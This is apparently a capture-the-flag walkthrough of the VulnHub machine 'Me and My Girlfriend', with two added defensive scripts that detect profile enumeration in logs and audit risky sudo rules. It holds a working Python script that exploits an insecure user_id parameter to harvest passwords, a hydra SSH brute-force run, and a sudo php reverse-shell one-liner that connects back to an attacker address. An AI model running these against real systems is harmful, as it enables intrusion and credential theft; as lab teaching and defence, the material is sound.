VulnHub machine: Me and My Girlfriend
Machine page: Me and My Girlfriend: 1 ~ VulnHub
The goal is to obtain two flag files.
Machine setup
After downloading the OVA, open and import it in VMware. Be sure to set the network adapter to the same network segment as your Kali machine, which is usually NAT.
Penetration test
Scan the target with nmap
└─# nmap -sV 192.168.5.137
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 14:42 CST
Nmap scan report for 192.168.5.137 (192.168.5.137)
Host is up (0.000077s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:A7:0D:91 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds
Port 80 is open, so a website is being served; brute-force its directories with dirsearch.
└─# dirsearch -u "http://192.168.5.137/"
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877
Output File: /root/.dirsearch/reports/192.168.5.137/_21-09-04_14-43-40.txt
Error Log: /root/.dirsearch/logs/errors-21-09-04_14-43-40.log
Target: http://192.168.5.137/
[14:43:40] Starting:
[14:43:41] 403 - 291B - /.ht_wsr.txt
[14:43:41] 403 - 294B - /.htaccess.save
[14:43:41] 403 - 294B - /.htaccess.orig
[14:43:41] 403 - 296B - /.htaccess.sample
[14:43:41] 403 - 294B - /.htaccess.bak1
[14:43:41] 403 - 294B - /.htaccess_orig
[14:43:41] 403 - 295B - /.htaccess_extra
[14:43:41] 403 - 292B - /.htaccessBAK
[14:43:41] 403 - 292B - /.htaccessOLD
[14:43:41] 403 - 293B - /.htaccessOLD2
[14:43:41] 403 - 292B - /.htaccess_sc
[14:43:41] 403 - 284B - /.htm
[14:43:41] 403 - 285B - /.html
[14:43:41] 403 - 290B - /.htpasswds
[14:43:41] 403 - 291B - /.httr-oauth
[14:43:41] 403 - 294B - /.htpasswd_test
[14:43:41] 403 - 284B - /.php
[14:43:41] 403 - 285B - /.php3
[14:43:47] 301 - 314B - /config -> http://192.168.5.137/config/
[14:43:47] 200 - 942B - /config/
[14:43:50] 200 - 120B - /index.php
[14:43:50] 200 - 120B - /index.php/login/
[14:43:51] 301 - 312B - /misc -> http://192.168.5.137/misc/
[14:43:53] 200 - 32B - /robots.txt
[14:43:53] 403 - 293B - /server-status
[14:43:53] 403 - 294B - /server-status/
Task Completed
Neither http://192.168.5.137/config/ nor http://192.168.5.137/misc/ contains anything useful.
So visit the home page. It offers login and registration, so register a user with the username and password qwe:qwe.
After logging in, clicking Profile leads to the URL http://192.168.5.137/index.php?page=profile&user_id=12, and the page shows your own account and password.
Try tampering with user_id=12 by changing it to user_id=1, so the URL becomes http://192.168.5.137/index.php?page=profile&user_id=1.
Visiting it shows a horizontal privilege escalation: the page now displays the account of the user with user_id=1.
So a Python script can enumerate every user's information. Run vim userinfo and write the following:
# coding:utf-8
import re
import requests

def GetUserInfo(id):
    headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
               'X-Forwarded-For': '127.0.0.1'}
    # The cookie has to be taken from a logged-in browser session and pasted here:
    # the horizontal privilege escalation only works after logging in
    cookie = {'PHPSESSID': 'dgkcddpe9nm8sdl60hkf12cfc5'}
    # 192.168.5.137 is the target IP; fetch the profile page with a GET request
    r = requests.get(url="http://192.168.5.137/index.php?page=profile&user_id=%s" % id,
                     headers=headers, cookies=cookie).text

    # Read the pre-filled form fields; return '' when a field is missing so the
    # caller can skip ids that hold no account data instead of crashing
    def field(pattern):
        m = re.search(pattern, r)
        return m.group(1) if m else ''

    name = field(r'id="name"\svalue="(.*?)">')
    username = field(r'username"\svalue="(.*?)"')
    password = field(r'password"\svalue="(.*?)"')
    return name, username, password

# Found by manual testing: the ids holding account data lie in 0~15
for i in range(0, 15):
    name, username, password = GetUserInfo(str(i))
    if name:
        # Save as username:password so hydra can use the file directly later
        print(str(username) + ":" + str(password))
Run python3 userinfo >> userssh to write the user information to userssh, then cat userssh to view and confirm the contents.
└─# cat userssh
eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
qwe:qwe
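The enumeration above leaves a telltale pattern in the web server's access log: one client requesting many distinct user_id values within seconds, where a real user views only their own profile. As an added example that is not part of the original write-up, the following Python detection logic runs over constructed Apache access-log lines (the IPs, timestamps and thresholds are assumptions, not captures from the box) and flags clients that enumerate profiles.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log sample, not a capture from the box: 192.168.5.129 walks
# several user_id values within seconds, 192.168.5.50 only ever views profile 3 (its own).
SAMPLE_LOG = """\
192.168.5.129 - - [04/Sep/2021:14:50:00 +0800] "GET /index.php?page=profile&user_id=12 HTTP/1.1" 200 942 "-" "Mozilla/5.0"
192.168.5.50 - - [04/Sep/2021:14:50:01 +0800] "GET /index.php?page=profile&user_id=3 HTTP/1.1" 200 940 "-" "Mozilla/5.0"
192.168.5.129 - - [04/Sep/2021:14:50:02 +0800] "GET /index.php?page=profile&user_id=0 HTTP/1.1" 200 901 "-" "python-requests/2.25.1"
192.168.5.129 - - [04/Sep/2021:14:50:02 +0800] "GET /index.php?page=profile&user_id=1 HTTP/1.1" 200 940 "-" "python-requests/2.25.1"
192.168.5.129 - - [04/Sep/2021:14:50:03 +0800] "GET /index.php?page=profile&user_id=2 HTTP/1.1" 200 940 "-" "python-requests/2.25.1"
192.168.5.129 - - [04/Sep/2021:14:50:03 +0800] "GET /index.php?page=profile&user_id=3 HTTP/1.1" 200 940 "-" "python-requests/2.25.1"
192.168.5.129 - - [04/Sep/2021:14:50:04 +0800] "GET /index.php?page=profile&user_id=4 HTTP/1.1" 200 940 "-" "python-requests/2.25.1"
"""

# Only profile requests matter; capture client IP, timestamp and the requested user_id.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET /index\.php\?page=profile&user_id=(?P<uid>\d+)[^"]*"')

def parse_profile_requests(log_text):
    """Return (ip, timestamp, user_id) for every profile request in the log text."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
            events.append((m.group('ip'), ts, int(m.group('uid'))))
    return events

def find_profile_enumeration(log_text, threshold=5, window_s=60):
    """Map each client IP to the distinct user_ids it requested inside some window_s span
    once that count reaches threshold; the script above asks for fifteen in a few seconds."""
    by_ip = defaultdict(list)
    for ip, ts, uid in parse_profile_requests(log_text):
        by_ip[ip].append((ts, uid))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            ids = {uid for ts, uid in events[i:] if (ts - start).total_seconds() <= window_s}
            if len(ids) >= threshold:
                flagged[ip] = sorted(ids)  # sorted so a sequential walk is obvious
                break
    return flagged

if __name__ == '__main__':
    for ip, ids in find_profile_enumeration(SAMPLE_LOG).items():
        print(f'{ip} requested {len(ids)} distinct profiles within 60s: {ids}')
```

The same rule can be keyed on the PHPSESSID cookie instead of the client IP when the log format records it, which also catches enumeration from behind a shared NAT address.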
Then brute-force SSH with hydra, feeding the file as login:password pairs.
└─# hydra -C userssh ssh://192.168.5.137
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-04 13:43:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries, ~1 try per task
[DATA] attacking ssh://192.168.5.137:22/
[22][ssh] host: 192.168.5.137 login: alice password: 4lic3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-04 13:43:14
This yields the SSH credentials alice:4lic3. Log in to the machine with ssh.
└─# ssh alice@192.168.5.137
The authenticity of host '192.168.5.137 (192.168.5.137)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.137' (ECDSA) to the list of known hosts.
alice@192.168.5.137's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ ls
alice@gfriEND:~$ whoami
alice
Search for the flag with find
alice@gfriEND:~$ find / -name *flag* -print 2>&1| grep -v "Permission denied"
/home/alice/.my_secret/flag1.txt
/usr/lib/perl/5.18.2/bits/waitflags.ph
...
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/module/scsi_mod/parameters/default_dev_flags
The flag is at /home/alice/.my_secret/flag1.txt; view it with cat.
alice@gfriEND:~$ cat /home/alice/.my_secret/flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
Check sudo privileges
alice@gfriEND:~$ sudo -l
Matching Defaults entries for alice on gfriEND:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on gfriEND:
(root) NOPASSWD: /usr/bin/php
The php command, runnable as root without a password, can be used for privilege escalation. Open another terminal and start a listener:
nc -lvnp 9000
Then use php to send back a reverse shell:
sudo php -r '$sock=fsockopen("192.168.5.129",9000);exec("/bin/bash -i <&3 >&3 2>&3");'
This gives a root shell:
└─# nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.5.129] from (UNKNOWN) [192.168.5.137] 55444
root@gfriEND:~# id
id
uid=0(root) gid=0(root) groups=0(root)
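The whole escalation rests on one sudoers line: a general-purpose interpreter allowed as root with NOPASSWD. As an added audit check that is not part of the original write-up, the following Python snippet parses `sudo -l` output (a constructed sample modelled on the entry shown above, with two extra hypothetical rules) and reports passwordless root rules whose command can run arbitrary code.

```python
import re

# Constructed `sudo -l` output modelled on the entry shown above; not a capture from the box.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
    (root) /usr/bin/apt-get
    (www-data) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# General-purpose interpreters and shells: any of them run as root becomes a root shell in
# one line, exactly as php -r does above. Hypothetical starting list; extend for your hosts.
SHELL_CAPABLE = {'php', 'python', 'python2', 'python3', 'perl', 'ruby', 'bash', 'sh', 'dash'}

# One rule line: "(runas[ : group]) [TAG: ...] /path/to/command [args]"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$')

def parse_sudo_rules(text):
    """Return (runas_user, tags, command, args) for every rule after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith('User ') and 'may run' in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            runas_user = m.group('runas').split(':')[0].strip()
            tags = {t.strip() for t in m.group('tags').split(':') if t.strip()}
            rules.append((runas_user, tags, m.group('cmd'), m.group('args').strip()))
    return rules

def risky_rules(text):
    """Commands runnable as root without a password that amount to arbitrary code execution."""
    risky = []
    for runas_user, tags, cmd, _args in parse_sudo_rules(text):
        if runas_user not in ('root', 'ALL') or 'NOPASSWD' not in tags:
            continue
        if cmd == 'ALL' or cmd.rsplit('/', 1)[-1] in SHELL_CAPABLE:
            risky.append(cmd)
    return risky

if __name__ == '__main__':
    for cmd in risky_rules(SAMPLE_SUDO_L):
        print(f'passwordless root via interpreter: {cmd}')
```

A rule that survives this check still deserves review: the apt-get and systemctl entries are only safe if their argument list stays fixed, which is why the parser keeps the args field.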
Find the flag
root@gfriEND:~# find / -name *flag*
find / -name *flag*
/root/flag2.txt
/home/alice/.my_secret/flag1.txt
/usr/lib/perl/5.18.2/bits/waitflags.ph
/usr/src/linux-headers-4.4.0-142-generic/include/config/zone/dma/flag.h
/usr/src/linux-headers-4.4.0-142-generic/include/config/trace/irqflags
...
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
The flag is at /root/flag2.txt; view it with cat.
root@gfriEND:~# cat /root/flag2.txt
cat /root/flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
Notes
When running find as an ordinary user, keep permissions in mind, otherwise the output is flooded with Permission denied errors. That is why the search here uses find / -name *flag* -print 2>&1| grep -v "Permission denied".